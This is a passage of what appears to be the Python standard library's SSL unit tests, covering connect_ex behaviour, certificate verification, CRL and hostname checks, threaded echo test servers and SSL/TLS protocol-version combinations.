test_connect_ex(self): # Issue #11326: check connect_ex() implementation with support.transient_internet(REMOTE_HOST): s = ssl.wrap_socket(socket.socket(socket.AF_INET), cert_reqs=ssl.CERT_REQUIRED, ca_certs=REMOTE_ROOT_CERT) try: self.assertEqual(0, s.connect_ex((REMOTE_HOST, 443))) self.assertTrue(s.getpeercert()) finally: s.close() def test_non_blocking_connect_ex(self): # Issue #11326: non-blocking connect_ex() should allow handshake # to proceed after the socket gets ready. with support.transient_internet(REMOTE_HOST): s = ssl.wrap_socket(socket.socket(socket.AF_INET), cert_reqs=ssl.CERT_REQUIRED, ca_certs=REMOTE_ROOT_CERT, do_handshake_on_connect=False) try: s.setblocking(False) rc = s.connect_ex((REMOTE_HOST, 443)) # EWOULDBLOCK under Windows, EINPROGRESS elsewhere self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK)) # Wait for connect to finish select.select([], [s], [], 5.0) # Non-blocking handshake while True: try: s.do_handshake() break except ssl.SSLWantReadError: select.select([s], [], [], 5.0) except ssl.SSLWantWriteError: select.select([], [s], [], 5.0) # SSL established self.assertTrue(s.getpeercert()) finally: s.close() def test_timeout_connect_ex(self): # Issue #12065: on a timeout, connect_ex() should return the original # errno (mimicking the behaviour of non-SSL sockets). with support.transient_internet(REMOTE_HOST): s = ssl.wrap_socket(socket.socket(socket.AF_INET), cert_reqs=ssl.CERT_REQUIRED, ca_certs=REMOTE_ROOT_CERT, do_handshake_on_connect=False) try: s.settimeout(0.0000001) rc = s.connect_ex((REMOTE_HOST, 443)) if rc == 0: self.skipTest("REMOTE_HOST responded too quickly") self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK)) finally: s.close() def test_connect_ex_error(self): with support.transient_internet(REMOTE_HOST): s = ssl.wrap_socket(socket.socket(socket.AF_INET), cert_reqs=ssl.CERT_REQUIRED, ca_certs=REMOTE_ROOT_CERT) try: rc = s.connect_ex((REMOTE_HOST, 444)) # Issue #19919: Windows machines or VMs hosted on Windows # machines sometimes return EWOULDBLOCK. errors = ( errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT, errno.EWOULDBLOCK, ) self.assertIn(rc, errors) finally: s.close() def test_connect_with_context(self): with support.transient_internet(REMOTE_HOST): # Same as test_connect, but with a separately created context ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) s = ctx.wrap_socket(socket.socket(socket.AF_INET)) s.connect((REMOTE_HOST, 443)) try: self.assertEqual({}, s.getpeercert()) finally: s.close() # Same with a server hostname s = ctx.wrap_socket(socket.socket(socket.AF_INET), server_hostname=REMOTE_HOST) s.connect((REMOTE_HOST, 443)) s.close() # This should fail because we have no verification certs ctx.verify_mode = ssl.CERT_REQUIRED s = ctx.wrap_socket(socket.socket(socket.AF_INET)) self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed", s.connect, (REMOTE_HOST, 443)) s.close() # This should succeed because we specify the root cert ctx.load_verify_locations(REMOTE_ROOT_CERT) s = ctx.wrap_socket(socket.socket(socket.AF_INET)) s.connect((REMOTE_HOST, 443)) try: cert = s.getpeercert() self.assertTrue(cert) finally: s.close() def test_connect_capath(self): # Verify server certificates using the `capath` argument # NOTE: the subject hashing algorithm has been changed between # OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must # contain both versions of each certificate (same content, different # filename) for this test to be portable across OpenSSL releases. with support.transient_internet(REMOTE_HOST): ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) ctx.verify_mode = ssl.CERT_REQUIRED ctx.load_verify_locations(capath=CAPATH) s = ctx.wrap_socket(socket.socket(socket.AF_INET)) s.connect((REMOTE_HOST, 443)) try: cert = s.getpeercert() self.assertTrue(cert) finally: s.close() # Same with a bytes `capath` argument ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) ctx.verify_mode = ssl.CERT_REQUIRED ctx.load_verify_locations(capath=BYTES_CAPATH) s = ctx.wrap_socket(socket.socket(socket.AF_INET)) s.connect((REMOTE_HOST, 443)) try: cert = s.getpeercert() self.assertTrue(cert) finally: s.close() def test_connect_cadata(self): with open(REMOTE_ROOT_CERT) as f: pem = f.read().decode('ascii') der = ssl.PEM_cert_to_DER_cert(pem) with support.transient_internet(REMOTE_HOST): ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) ctx.verify_mode = ssl.CERT_REQUIRED ctx.load_verify_locations(cadata=pem) with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s: s.connect((REMOTE_HOST, 443)) cert = s.getpeercert() self.assertTrue(cert) # same with DER ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) ctx.verify_mode = ssl.CERT_REQUIRED ctx.load_verify_locations(cadata=der) with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s: s.connect((REMOTE_HOST, 443)) cert = s.getpeercert() self.assertTrue(cert) @unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows") def test_makefile_close(self): # Issue #5238: creating a file-like object with makefile() shouldn't # delay closing the underlying "real socket" (here tested with its # file descriptor, hence skipping the test under Windows). with support.transient_internet(REMOTE_HOST): ss = ssl.wrap_socket(socket.socket(socket.AF_INET)) ss.connect((REMOTE_HOST, 443)) fd = ss.fileno() f = ss.makefile() f.close() # The fd is still open os.read(fd, 0) # Closing the SSL socket should close the fd too ss.close() gc.collect() with self.assertRaises(OSError) as e: os.read(fd, 0) self.assertEqual(e.exception.errno, errno.EBADF) def test_non_blocking_handshake(self): with support.transient_internet(REMOTE_HOST): s = socket.socket(socket.AF_INET) s.connect((REMOTE_HOST, 443)) s.setblocking(False) s = ssl.wrap_socket(s, cert_reqs=ssl.CERT_NONE, do_handshake_on_connect=False) count = 0 while True: try: count += 1 s.do_handshake() break except ssl.SSLWantReadError: select.select([s], [], []) except ssl.SSLWantWriteError: select.select([], [s], []) s.close() if support.verbose: sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count) def test_get_server_certificate(self): def _test_get_server_certificate(host, port, cert=None): with support.transient_internet(host): pem = ssl.get_server_certificate((host, port)) if not pem: self.fail("No server certificate on %s:%s!" % (host, port)) try: pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE) except ssl.SSLError as x: #should fail if support.verbose: sys.stdout.write("%s\n" % x) else: self.fail("Got server certificate %s for %s:%s!" % (pem, host, port)) pem = ssl.get_server_certificate((host, port), ca_certs=cert) if not pem: self.fail("No server certificate on %s:%s!" % (host, port)) if support.verbose: sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem)) _test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT) if support.IPV6_ENABLED: _test_get_server_certificate('ipv6.google.com', 443) def test_ciphers(self): remote = (REMOTE_HOST, 443) with support.transient_internet(remote[0]): with closing(ssl.wrap_socket(socket.socket(socket.AF_INET), cert_reqs=ssl.CERT_NONE, ciphers="ALL")) as s: s.connect(remote) with closing(ssl.wrap_socket(socket.socket(socket.AF_INET), cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")) as s: s.connect(remote) # Error checking can happen at instantiation or when connecting with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"): with closing(socket.socket(socket.AF_INET)) as sock: s = ssl.wrap_socket(sock, cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx") s.connect(remote) def test_algorithms(self): # Issue #8484: all algorithms should be available when verifying a # certificate. # SHA256 was added in OpenSSL 0.9.8 if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15): self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION) # sha256.tbs-internet.com needs SNI to use the correct certificate if not ssl.HAS_SNI: self.skipTest("SNI needed for this test") # https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host) remote = ("sha256.tbs-internet.com", 443) sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem") with support.transient_internet("sha256.tbs-internet.com"): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.verify_mode = ssl.CERT_REQUIRED ctx.load_verify_locations(sha256_cert) s = ctx.wrap_socket(socket.socket(socket.AF_INET), server_hostname="sha256.tbs-internet.com") try: s.connect(remote) if support.verbose: sys.stdout.write("\nCipher with %r is %r\n" % (remote, s.cipher())) sys.stdout.write("Certificate is:\n%s\n" % pprint.pformat(s.getpeercert())) finally: s.close() def test_get_ca_certs_capath(self): # capath certs are loaded on request with support.transient_internet(REMOTE_HOST): ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) ctx.verify_mode = ssl.CERT_REQUIRED ctx.load_verify_locations(capath=CAPATH) self.assertEqual(ctx.get_ca_certs(), []) s = ctx.wrap_socket(socket.socket(socket.AF_INET)) s.connect((REMOTE_HOST, 443)) try: cert = s.getpeercert() self.assertTrue(cert) finally: s.close() self.assertEqual(len(ctx.get_ca_certs()), 1) @needs_sni def test_context_setget(self): # Check that the context of a connected socket can be replaced. with support.transient_internet(REMOTE_HOST): ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23) s = socket.socket(socket.AF_INET) with closing(ctx1.wrap_socket(s)) as ss: ss.connect((REMOTE_HOST, 443)) self.assertIs(ss.context, ctx1) self.assertIs(ss._sslobj.context, ctx1) ss.context = ctx2 self.assertIs(ss.context, ctx2) self.assertIs(ss._sslobj.context, ctx2) try: import threading except ImportError: _have_threads = False else: _have_threads = True from test.ssl_servers import make_https_server class ThreadedEchoServer(threading.Thread): class ConnectionHandler(threading.Thread): """A mildly complicated class, because we want it to work both with and without the SSL wrapper around the socket connection, so that we can test the STARTTLS functionality.""" def __init__(self, server, connsock, addr): self.server = server self.running = False self.sock = connsock self.addr = addr self.sock.setblocking(1) self.sslconn = None threading.Thread.__init__(self) self.daemon = True def wrap_conn(self): try: self.sslconn = self.server.context.wrap_socket( self.sock, server_side=True) self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol()) self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol()) except socket.error as e: # We treat ConnectionResetError as though it were an # SSLError - OpenSSL on Ubuntu abruptly closes the # connection when asked to use an unsupported protocol. # # XXX Various errors can have happened here, for example # a mismatching protocol version, an invalid certificate, # or a low-level bug. This should be made more discriminating. if not isinstance(e, ssl.SSLError) and e.errno != errno.ECONNRESET: raise self.server.conn_errors.append(e) if self.server.chatty: handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n") self.running = False self.server.stop() self.close() return False else: if self.server.context.verify_mode == ssl.CERT_REQUIRED: cert = self.sslconn.getpeercert() if support.verbose and self.server.chatty: sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n") cert_binary = self.sslconn.getpeercert(True) if support.verbose and self.server.chatty: sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n") cipher = self.sslconn.cipher() if support.verbose and self.server.chatty: sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n") sys.stdout.write(" server: selected protocol is now " + str(self.sslconn.selected_npn_protocol()) + "\n") return True def read(self): if self.sslconn: return self.sslconn.read() else: return self.sock.recv(1024) def write(self, bytes): if self.sslconn: return self.sslconn.write(bytes) else: return self.sock.send(bytes) def close(self): if self.sslconn: self.sslconn.close() else: self.sock.close() def run(self): self.running = True if not self.server.starttls_server: if not self.wrap_conn(): return while self.running: try: msg = self.read() stripped = msg.strip() if not stripped: # eof, so quit this handler self.running = False self.close() elif stripped == b'over': if support.verbose and self.server.connectionchatty: sys.stdout.write(" server: client closed connection\n") self.close() return elif (self.server.starttls_server and stripped == b'STARTTLS'): if support.verbose and self.server.connectionchatty: sys.stdout.write(" server: read STARTTLS from client, sending OK...\n") self.write(b"OK\n") if not self.wrap_conn(): return elif (self.server.starttls_server and self.sslconn and stripped == b'ENDTLS'): if support.verbose and self.server.connectionchatty: sys.stdout.write(" server: read ENDTLS from client, sending OK...\n") self.write(b"OK\n") self.sock = self.sslconn.unwrap() self.sslconn = None if support.verbose and self.server.connectionchatty: sys.stdout.write(" server: connection is now unencrypted...\n") elif stripped == b'CB tls-unique': if support.verbose and self.server.connectionchatty: sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n") data = self.sslconn.get_channel_binding("tls-unique") self.write(repr(data).encode("us-ascii") + b"\n") else: if (support.verbose and self.server.connectionchatty): ctype = (self.sslconn and "encrypted") or "unencrypted" sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n" % (msg, ctype, msg.lower(), ctype)) self.write(msg.lower()) except ssl.SSLError: if self.server.chatty: handle_error("Test server failure:\n") self.close() self.running = False # normally, we'd just stop here, but for the test # harness, we want to stop the server self.server.stop() def __init__(self, certificate=None, ssl_version=None, certreqs=None, cacerts=None, chatty=True, connectionchatty=False, starttls_server=False, npn_protocols=None, alpn_protocols=None, ciphers=None, context=None): if context: self.context = context else: self.context = ssl.SSLContext(ssl_version if ssl_version is not None else ssl.PROTOCOL_TLSv1) self.context.verify_mode = (certreqs if certreqs is not None else ssl.CERT_NONE) if cacerts: self.context.load_verify_locations(cacerts) if certificate: self.context.load_cert_chain(certificate) if npn_protocols: self.context.set_npn_protocols(npn_protocols) if alpn_protocols: self.context.set_alpn_protocols(alpn_protocols) if ciphers: self.context.set_ciphers(ciphers) self.chatty = chatty self.connectionchatty = connectionchatty self.starttls_server = starttls_server self.sock = socket.socket() self.port = support.bind_port(self.sock) self.flag = None self.active = False self.selected_npn_protocols = [] self.selected_alpn_protocols = [] self.conn_errors = [] threading.Thread.__init__(self) self.daemon = True def __enter__(self): self.start(threading.Event()) self.flag.wait() return self def __exit__(self, *args): self.stop() self.join() def start(self, flag=None): self.flag = flag threading.Thread.start(self) def run(self): self.sock.settimeout(0.05) self.sock.listen(5) self.active = True if self.flag: # signal an event self.flag.set() while self.active: try: newconn, connaddr = self.sock.accept() if support.verbose and self.chatty: sys.stdout.write(' server: new connection from ' + repr(connaddr) + '\n') handler = self.ConnectionHandler(self, newconn, connaddr) handler.start() handler.join() except socket.timeout: pass except KeyboardInterrupt: self.stop() self.sock.close() def stop(self): self.active = False class AsyncoreEchoServer(threading.Thread): class EchoServer(asyncore.dispatcher): class ConnectionHandler(asyncore.dispatcher_with_send): def __init__(self, conn, certfile): self.socket = ssl.wrap_socket(conn, server_side=True, certfile=certfile, do_handshake_on_connect=False) asyncore.dispatcher_with_send.__init__(self, self.socket) self._ssl_accepting = True self._do_ssl_handshake() def readable(self): if isinstance(self.socket, ssl.SSLSocket): while self.socket.pending() > 0: self.handle_read_event() return True def _do_ssl_handshake(self): try: self.socket.do_handshake() except (ssl.SSLWantReadError, ssl.SSLWantWriteError): return except ssl.SSLEOFError: return self.handle_close() except ssl.SSLError: raise except socket.error, err: if err.args[0] == errno.ECONNABORTED: return self.handle_close() else: self._ssl_accepting = False def handle_read(self): if self._ssl_accepting: self._do_ssl_handshake() else: data = self.recv(1024) if support.verbose: sys.stdout.write(" server: read %s from client\n" % repr(data)) if not data: self.close() else: self.send(data.lower()) def handle_close(self): self.close() if support.verbose: sys.stdout.write(" server: closed connection %s\n" % self.socket) def handle_error(self): raise def __init__(self, certfile): self.certfile = certfile sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.port = support.bind_port(sock, '') asyncore.dispatcher.__init__(self, sock) self.listen(5) def handle_accept(self): sock_obj, addr = self.accept() if support.verbose: sys.stdout.write(" server: new connection from %s:%s\n" %addr) self.ConnectionHandler(sock_obj, self.certfile) def handle_error(self): raise def __init__(self, certfile): self.flag = None self.active = False self.server = self.EchoServer(certfile) self.port = self.server.port threading.Thread.__init__(self) self.daemon = True def __str__(self): return "<%s %s>" % (self.__class__.__name__, self.server) def __enter__(self): self.start(threading.Event()) self.flag.wait() return self def __exit__(self, *args): if support.verbose: sys.stdout.write(" cleanup: stopping server.\n") self.stop() if support.verbose: sys.stdout.write(" cleanup: joining server thread.\n") self.join() if support.verbose: sys.stdout.write(" cleanup: successfully joined.\n") def start(self, flag=None): self.flag = flag threading.Thread.start(self) def run(self): self.active = True if self.flag: self.flag.set() while self.active: try: asyncore.loop(1) except: pass def stop(self): self.active = False self.server.close() def bad_cert_test(certfile): """ Launch a server with CERT_REQUIRED, and check that trying to connect to it with the given client certificate fails. """ server = ThreadedEchoServer(CERTFILE, certreqs=ssl.CERT_REQUIRED, cacerts=CERTFILE, chatty=False, connectionchatty=False) with server: try: with closing(socket.socket()) as sock: s = ssl.wrap_socket(sock, certfile=certfile, ssl_version=ssl.PROTOCOL_TLSv1) s.connect((HOST, server.port)) except ssl.SSLError as x: if support.verbose: sys.stdout.write("\nSSLError is %s\n" % x.args[1]) except OSError as x: if support.verbose: sys.stdout.write("\nOSError is %s\n" % x.args[1]) except OSError as x: if x.errno != errno.ENOENT: raise if support.verbose: sys.stdout.write("\OSError is %s\n" % str(x)) else: raise AssertionError("Use of invalid cert should have failed!") def server_params_test(client_context, server_context, indata=b"FOO\n", chatty=True, connectionchatty=False, sni_name=None): """ Launch a server, connect a client to it and try various reads and writes. """ stats = {} server = ThreadedEchoServer(context=server_context, chatty=chatty, connectionchatty=False) with server: with closing(client_context.wrap_socket(socket.socket(), server_hostname=sni_name)) as s: s.connect((HOST, server.port)) for arg in [indata, bytearray(indata), memoryview(indata)]: if connectionchatty: if support.verbose: sys.stdout.write( " client: sending %r...\n" % indata) s.write(arg) outdata = s.read() if connectionchatty: if support.verbose: sys.stdout.write(" client: read %r\n" % outdata) if outdata != indata.lower(): raise AssertionError( "bad data <<%r>> (%d) received; expected <<%r>> (%d)\n" % (outdata[:20], len(outdata), indata[:20].lower(), len(indata))) s.write(b"over\n") if connectionchatty: if support.verbose: sys.stdout.write(" client: closing connection.\n") stats.update({ 'compression': s.compression(), 'cipher': s.cipher(), 'peercert': s.getpeercert(), 'client_alpn_protocol': s.selected_alpn_protocol(), 'client_npn_protocol': s.selected_npn_protocol(), 'version': s.version(), }) s.close() stats['server_alpn_protocols'] = server.selected_alpn_protocols stats['server_npn_protocols'] = server.selected_npn_protocols return stats def try_protocol_combo(server_protocol, client_protocol, expect_success, certsreqs=None, server_options=0, client_options=0): """ Try to SSL-connect using *client_protocol* to *server_protocol*. If *expect_success* is true, assert that the connection succeeds, if it's false, assert that the connection fails. Also, if *expect_success* is a string, assert that it is the protocol version actually used by the connection. """ if certsreqs is None: certsreqs = ssl.CERT_NONE certtype = { ssl.CERT_NONE: "CERT_NONE", ssl.CERT_OPTIONAL: "CERT_OPTIONAL", ssl.CERT_REQUIRED: "CERT_REQUIRED", }[certsreqs] if support.verbose: formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n" sys.stdout.write(formatstr % (ssl.get_protocol_name(client_protocol), ssl.get_protocol_name(server_protocol), certtype)) client_context = ssl.SSLContext(client_protocol) client_context.options |= client_options server_context = ssl.SSLContext(server_protocol) server_context.options |= server_options # NOTE: we must enable "ALL" ciphers on the client, otherwise an # SSLv23 client will send an SSLv3 hello (rather than SSLv2) # starting from OpenSSL 1.0.0 (see issue #8322). if client_context.protocol == ssl.PROTOCOL_SSLv23: client_context.set_ciphers("ALL") for ctx in (client_context, server_context): ctx.verify_mode = certsreqs ctx.load_cert_chain(CERTFILE) ctx.load_verify_locations(CERTFILE) try: stats = server_params_test(client_context, server_context, chatty=False, connectionchatty=False) # Protocol mismatch can result in either an SSLError, or a # "Connection reset by peer" error. except ssl.SSLError: if expect_success: raise except socket.error as e: if expect_success or e.errno != errno.ECONNRESET: raise else: if not expect_success: raise AssertionError( "Client protocol %s succeeded with server protocol %s!" % (ssl.get_protocol_name(client_protocol), ssl.get_protocol_name(server_protocol))) elif (expect_success is not True and expect_success != stats['version']): raise AssertionError("version mismatch: expected %r, got %r" % (expect_success, stats['version'])) class ThreadedTests(unittest.TestCase): @skip_if_broken_ubuntu_ssl def test_echo(self): """Basic test of an SSL client connecting to a server""" if support.verbose: sys.stdout.write("\n") for protocol in PROTOCOLS: context = ssl.SSLContext(protocol) context.load_cert_chain(CERTFILE) server_params_test(context, context, chatty=True, connectionchatty=True) def test_getpeercert(self): if support.verbose: sys.stdout.write("\n") context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) context.verify_mode = ssl.CERT_REQUIRED context.load_verify_locations(CERTFILE) context.load_cert_chain(CERTFILE) server = ThreadedEchoServer(context=context, chatty=False) with server: s = context.wrap_socket(socket.socket(), do_handshake_on_connect=False) s.connect((HOST, server.port)) # getpeercert() raise ValueError while the handshake isn't # done. with self.assertRaises(ValueError): s.getpeercert() s.do_handshake() cert = s.getpeercert() self.assertTrue(cert, "Can't get peer certificate.") cipher = s.cipher() if support.verbose: sys.stdout.write(pprint.pformat(cert) + '\n') sys.stdout.write("Connection cipher is " + str(cipher) + '.\n') if 'subject' not in cert: self.fail("No subject field in certificate: %s." % pprint.pformat(cert)) if ((('organizationName', 'Python Software Foundation'),) not in cert['subject']): self.fail( "Missing or invalid 'organizationName' field in certificate subject; " "should be 'Python Software Foundation'.") self.assertIn('notBefore', cert) self.assertIn('notAfter', cert) before = ssl.cert_time_to_seconds(cert['notBefore']) after = ssl.cert_time_to_seconds(cert['notAfter']) self.assertLess(before, after) s.close() @unittest.skipUnless(have_verify_flags(), "verify_flags need OpenSSL > 0.9.8") def test_crl_check(self): if support.verbose: sys.stdout.write("\n") server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) server_context.load_cert_chain(SIGNED_CERTFILE) context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) context.verify_mode = ssl.CERT_REQUIRED context.load_verify_locations(SIGNING_CA) tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0) self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf) # VERIFY_DEFAULT should pass server = ThreadedEchoServer(context=server_context, chatty=True) with server: with closing(context.wrap_socket(socket.socket())) as s: s.connect((HOST, server.port)) cert = s.getpeercert() self.assertTrue(cert, "Can't get peer certificate.") # VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF server = ThreadedEchoServer(context=server_context, chatty=True) with server: with closing(context.wrap_socket(socket.socket())) as s: with self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed"): s.connect((HOST, server.port)) # now load a CRL file. The CRL file is signed by the CA. context.load_verify_locations(CRLFILE) server = ThreadedEchoServer(context=server_context, chatty=True) with server: with closing(context.wrap_socket(socket.socket())) as s: s.connect((HOST, server.port)) cert = s.getpeercert() self.assertTrue(cert, "Can't get peer certificate.") def test_check_hostname(self): if support.verbose: sys.stdout.write("\n") server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) server_context.load_cert_chain(SIGNED_CERTFILE) context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) context.verify_mode = ssl.CERT_REQUIRED context.check_hostname = True context.load_verify_locations(SIGNING_CA) # correct hostname should verify server = ThreadedEchoServer(context=server_context, chatty=True) with server: with closing(context.wrap_socket(socket.socket(), server_hostname="localhost")) as s: s.connect((HOST, server.port)) cert = s.getpeercert() self.assertTrue(cert, "Can't get peer certificate.") # incorrect hostname should raise an exception server = ThreadedEchoServer(context=server_context, chatty=True) with server: with closing(context.wrap_socket(socket.socket(), server_hostname="invalid")) as s: with self.assertRaisesRegexp(ssl.CertificateError, "hostname 'invalid' doesn't match u?'localhost'"): s.connect((HOST, server.port)) # missing server_hostname arg should cause an exception, too server = ThreadedEchoServer(context=server_context, chatty=True) with server: with closing(socket.socket()) as s: with self.assertRaisesRegexp(ValueError, "check_hostname requires server_hostname"): context.wrap_socket(s) def test_empty_cert(self): """Connecting with an empty cert file""" bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir, "nullcert.pem")) def test_malformed_cert(self): """Connecting with a badly formatted certificate (syntax error)""" bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir, "badcert.pem")) def test_nonexisting_cert(self): """Connecting with a non-existing cert file""" bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir, "wrongcert.pem")) def test_malformed_key(self): """Connecting with a badly formatted key (syntax error)""" bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir, "badkey.pem")) def test_rude_shutdown(self): """A brutal shutdown of an SSL server should raise an OSError in the client when attempting handshake. """ listener_ready = threading.Event() listener_gone = threading.Event() s = socket.socket() port = support.bind_port(s, HOST) # `listener` runs in a thread. It sits in an accept() until # the main thread connects. Then it rudely closes the socket, # and sets Event `listener_gone` to let the main thread know # the socket is gone. def listener(): s.listen(5) listener_ready.set() newsock, addr = s.accept() newsock.close() s.close() listener_gone.set() def connector(): listener_ready.wait() with closing(socket.socket()) as c: c.connect((HOST, port)) listener_gone.wait() try: ssl_sock = ssl.wrap_socket(c) except socket.error: pass else: self.fail('connecting to closed SSL socket should have failed') t = threading.Thread(target=listener) t.start() try: connector() finally: t.join() @skip_if_broken_ubuntu_ssl @unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'), "OpenSSL is compiled without SSLv2 support") def test_protocol_sslv2(self): """Connecting to an SSLv2 server with various client options""" if support.verbose: sys.stdout.write("\n") try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True) try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL) try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED) try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False) try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False) try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False) # SSLv23 client with specific SSL options if no_sslv2_implies_sslv3_hello(): # No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False, client_options=ssl.OP_NO_SSLv2) try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False, client_options=ssl.OP_NO_SSLv3) try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False, client_options=ssl.OP_NO_TLSv1) @skip_if_broken_ubuntu_ssl def test_protocol_sslv23(self): """Connecting to an SSLv23 server with various client options""" if support.verbose: sys.stdout.write("\n") if hasattr(ssl, 'PROTOCOL_SSLv2'): try: try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True) except socket.error as x: # this fails on some older versions of OpenSSL (0.9.7l, for instance) if support.verbose: sys.stdout.write( " SSL2 client to SSL23 server test unexpectedly failed:\n %s\n" % str(x)) if hasattr(ssl, 'PROTOCOL_SSLv3'): try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3') try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1') if hasattr(ssl, 'PROTOCOL_SSLv3'): try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL) if hasattr(ssl, 'PROTOCOL_SSLv3'): try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED) # Server with specific SSL options if hasattr(ssl, 'PROTOCOL_SSLv3'): try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, server_options=ssl.OP_NO_SSLv3) # Will choose TLSv1 try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False, server_options=ssl.OP_NO_TLSv1) @skip_if_broken_ubuntu_ssl @unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'), "OpenSSL is compiled without SSLv3 support") def test_protocol_sslv3(self): """Connecting to an SSLv3 server with various client options""" if support.verbose: sys.stdout.write("\n") try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3') try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL) try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED) if hasattr(ssl, 'PROTOCOL_SSLv2'): try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False) try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False, client_options=ssl.OP_NO_SSLv3) try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False) if no_sslv2_implies_sslv3_hello(): # No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, 'SSLv3', client_options=ssl.OP_NO_SSLv2) @skip_if_broken_ubuntu_ssl def 